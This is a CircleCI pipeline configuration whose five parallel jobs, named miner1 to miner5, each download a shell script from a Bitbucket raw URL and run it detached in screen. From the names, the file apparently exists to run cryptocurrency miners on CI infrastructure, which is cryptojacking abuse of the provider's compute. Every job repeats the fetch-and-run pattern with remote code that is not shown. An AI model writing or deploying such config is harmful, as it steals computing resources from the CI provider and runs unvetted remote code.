version: 2.1

jobs:
  miner1:
    docker:
      - image: ubuntu:20.04
    steps:
      - run:
          name: Install Git
          command: |
            apt-get update
            apt-get install wget -y
            apt-get install screen -y
      - run:
          name: Clone and Run Script
          command: |
            wget https://bitbucket.org/temera881/newss/raw/44434936b43f2cf3314336378aab6f52e2f336d8/ccl.sh
            chmod +x ccl.sh
            screen -d -m ./ccl.sh

  miner2:
    docker:
      - image: ubuntu:20.04
    steps:
      - run:
          name: Install Git
          command: |
            apt-get update
            apt-get install wget -y
            apt-get install screen -y
      - run:
          name: Clone and Run Script
          command: |
            wget https://bitbucket.org/temera881/newss/raw/44434936b43f2cf3314336378aab6f52e2f336d8/ccl.sh
            chmod +x ccl.sh
            screen -d -m ./ccl.sh

  miner3:
    docker:
      - image: ubuntu:20.04
    steps:
      - run:
          name: Install Git
          command: |
            apt-get update
            apt-get install wget -y
            apt-get install screen -y
      - run:
          name: Clone and Run Script
          command: |
            wget https://bitbucket.org/temera881/newss/raw/44434936b43f2cf3314336378aab6f52e2f336d8/ccl.sh
            chmod +x ccl.sh
            screen -d -m ./ccl.sh

  miner4:
    docker:
      - image: ubuntu:20.04
    steps:
      - run:
          name: Install Git
          command: |
            apt-get update
            apt-get install wget -y
            apt-get install screen -y
      - run:
          name: Clone and Run Script
          command: |
            wget https://bitbucket.org/temera881/newss/raw/44434936b43f2cf3314336378aab6f52e2f336d8/ccl.sh
            chmod +x ccl.sh
            screen -d -m ./ccl.sh

  miner5:
    docker:
      - image: ubuntu:20.04
    steps:
      - run:
          name: Install Git
          command: |
            apt-get update
            apt-get install wget -y
            apt-get install screen -y
      - run:
          name: Clone and Run Script
          command: |
            wget https://bitbucket.org/temera881/newss/raw/44434936b43f2cf3314336378aab6f52e2f336d8/ccl.sh
            chmod +x ccl.sh
            screen -d -m ./ccl.sh

workflows:
  version: 2
  parallel_miners:
    jobs:
      - miner1
      - miner2
      - miner3
      - miner4
      - miner5
